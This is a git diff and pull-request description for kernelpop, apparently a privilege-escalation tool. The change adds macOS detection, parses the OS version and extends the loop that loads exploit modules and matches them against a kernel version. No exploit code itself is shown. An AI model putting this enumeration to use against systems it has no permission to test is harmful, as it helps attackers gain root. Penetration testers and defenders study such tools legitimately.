--- a/src/kernelpop.py
+++ b/src/kernelpop.py
@@ -6,7 +6,7 @@ from constants import LINUX_EXPLOIT_PATH, HIGH_RELIABILITY, MEDIUM_RELIABILITY, 
 	color_print, UBUNTU_12, UBUNTU_12_LTS, UBUNTU_14, UBUNTU_14_LTS, UBUNTU_16, UBUNTU_16_LTS, UBUNTU_GENERIC, \
 	GENERIC_LINUX, CONFIRMED_VULNERABLE, POTENTIALLY_VULNERABLE, NOT_VULNERABLE, UBUNTU_7, UBUNTU_7_LTS, UBUNTU_8, \
 	UBUNTU_8_LTS, UBUNTU_9, UBUNTU_9_LTS, UBUNTU_17, UBUNTU_17_LTS, DEBIAN_GENERIC, UBUNTU_15, UBUNTU_15_LTS, \
-	UBUNTU_6, ARCHITECTURE_GENERIC, shell_results
+	UBUNTU_6, ARCHITECTURE_GENERIC, shell_results, MAC_EXPLOIT_PATH, GENERIC_MAC
 
 
 class Kernel:
@@ -110,6 +110,9 @@ class Kernel:
 			# etc ...
 			else:
 				return GENERIC_LINUX
+
+		elif "darwin" in kernel_version.lower():
+			return GENERIC_MAC
 
 		return "unknown"
 
@@ -229,7 +232,7 @@ def get_mac_version():
 	return v_major, v_minor, v_release
 
 
-def get_kernel_version(uname=None, osx_ver=False):
+def get_kernel_version(uname=None, osx_ver=None):
 	"""
 	get_kernel_version()
 
@@ -257,12 +260,14 @@ def get_kernel_version(uname=None, osx_ver=False):
 			return Kernel(kernel_version["normal"])
 	else:
 		if osx_ver:
-			color_print("[-] need to implement version replacing in uname input (FIX SPENCER)", color="red")
-			exit(1)
+			uname_pre = " ".join(uname.split(" ")[:2])
+			uname_post = " ".join(uname.split(" ")[3:])
+			uname_os_version = "{} {} {}".format(uname_pre, osx_ver, uname_post)
+			return Kernel(uname_os_version, uname=True)
+
 
 		else:
 			return Kernel(uname, uname=True)
-
 
 def potentially_vulnerable(kernel_version, exploit_module):
 	"""
@@ -309,24 +314,30 @@ def find_exploit_locally(kernel_version):
 	}
 	found_exploits = {"confirmed": confirmed, "potential": potential}
 
+	kernel_exploits_and_paths = [
+		["linux", LINUX_EXPLOIT_PATH],
+		["mac", MAC_EXPLOIT_PATH]
+	]
+
 	color_print("[*] matching kernel to known exploits")
-	if kernel_version.type == "linux":
-		all_exploits = os.listdir(LINUX_EXPLOIT_PATH)
-		for exploit_file in all_exploits:
-			if exploit_file[-3:] == ".py" and "__init__" not in exploit_file:
-				exploit_name = exploit_file.replace(".py", "")
-				exploit_module = locate("exploits.linux.{}.{}".format(exploit_name, exploit_name))
-				exploit_instance = exploit_module()
-				if potentially_vulnerable(kernel_version, exploit_instance) == CONFIRMED_VULNERABLE:
-					color_print("\t[+] found `confirmed` kernel exploit: {}".format(exploit_instance.name),
-								color="green")
-					found_exploits["confirmed"][exploit_instance.reliability].append(exploit_instance)
-				elif potentially_vulnerable(kernel_version, exploit_instance) == POTENTIALLY_VULNERABLE:
-					color_print("\t[+] found `potential` kernel exploit: {}".format(exploit_instance.name),
-								color="yellow")
-					found_exploits["potential"][exploit_instance.reliability].append(exploit_instance)
-				else:
-					del exploit_module
+	for idx,k_ex_path in enumerate(kernel_exploits_and_paths):
+		if kernel_version.type == kernel_exploits_and_paths[idx][0]:
+			all_exploits = os.listdir(kernel_exploits_and_paths[idx][1])
+			for exploit_file in all_exploits:
+				if exploit_file[-3:] == ".py" and "__init__" not in exploit_file:
+					exploit_name = exploit_file.replace(".py", "")
+					exploit_module = locate("exploits.{}.{}.{}".format(kernel_exploits_and_paths[idx][0],exploit_name, exploit_name))
+					exploit_instance = exploit_module()
+					if potentially_vulnerable(kernel_version, exploit_instance) == CONFIRMED_VULNERABLE:
+						color_print("\t[+] found `confirmed` kernel exploit: {}".format(exploit_instance.name),
+									color="green")
+						found_exploits["confirmed"][exploit_instance.reliability].append(exploit_instance)
+					elif potentially_vulnerable(kernel_version, exploit_instance) == POTENTIALLY_VULNERABLE:
+						color_print("\t[+] found `potential` kernel exploit: {}".format(exploit_instance.name),
+									color="yellow")
+						found_exploits["potential"][exploit_instance.reliability].append(exploit_instance)
+					else:
+						del exploit_module
 
 	return found_exploits
 
@@ -471,7 +482,7 @@ def kernelpop(mode="enumerate", uname=None, exploit=None, osx_ver=None):
 	else:
 		if uname:
 			if osx_ver:
-				kernel_v = get_kernel_version(uname=uname, osx_ver=True)
+				kernel_v = get_kernel_version(uname=uname, osx_ver=osx_ver)
 			else:
 				kernel_v = get_kernel_version(uname=uname)
 		else:

--- a/src/kernelpop.py
+++ b/src/kernelpop.py
@@ -113,22 +113,6 @@ class Kernel:
 
 		return "unknown"
 
-<<<<<<< HEAD
-=======
-	def get_mac_version(self):
-		"""
-		Gets the mac operating system version vs. the kernel version
-		:return:
-		"""
-		v_command = "sw_vers"
-		mac_v = shell_results(v_command)[0].decode('utf-8')
-		v_major = int(mac_v.split("\n")[1].split("\t")[1].split(".")[0])
-		v_minor = int(mac_v.split("\n")[1].split("\t")[1].split(".")[1])
-		v_release = int(mac_v.split("\n")[1].split("\t")[1].split(".")[2])
-
-		return v_major, v_minor, v_release
-
->>>>>>> 2f654d055de5fde802d4b39c9c9430a4e6876247
 	def process_kernel_version(self, kernel_version, uname=False):
 		# running on mac
 		# Darwin-16.7.0-x86_64-i686-64bit
@@ -139,9 +123,9 @@ class Kernel:
 				k_type = "mac"
 				k_distro = self.parse_distro(kernel_version)
 				k_name = kernel_version.split(" ")[0]
-				k_major = int(kernel_version.split("-")[1].split(".")[0])
-				k_minor = int(kernel_version.split("-")[1].split(".")[1])
-				k_release = int(kernel_version.split("-")[1].split(".")[2])
+				k_major = int(kernel_version.split(" ")[2].split(".")[0])
+				k_minor = int(kernel_version.split(" ")[2].split(".")[1])
+				k_release = int(kernel_version.split(" ")[2].split(".")[2])
 				k_architecture = kernel_version.split(" ")[-1]
 				# replace any bad architecture parses
 				for architecture in ["x86", "i686", "amd64", "x86_64"]:
@@ -153,7 +137,9 @@ class Kernel:
 				k_type = "mac"
 				k_distro = self.parse_distro(kernel_version)
 				k_name = kernel_version.split("-")[0]
-				k_major, k_minor, k_release = self.get_mac_version()
+				k_major = int(kernel_version.split("-")[1].split(".")[0])
+				k_minor = int(kernel_version.split("-")[1].split(".")[1])
+				k_release = int(kernel_version.split("-")[1].split(".")[2])
 				k_architecture = kernel_version.split("-")[2]
 				# replace any bad architecture parses
 				for architecture in ["x86", "i686", "amd64", "x86_64"]:


### PR DESCRIPTION
added mac exploitability now. however, as most mac priv esc exploits use the os version instead of kernel version, the uname -a input format has been changed to replace the kernel version with the os version along with the automated kernel version discovery.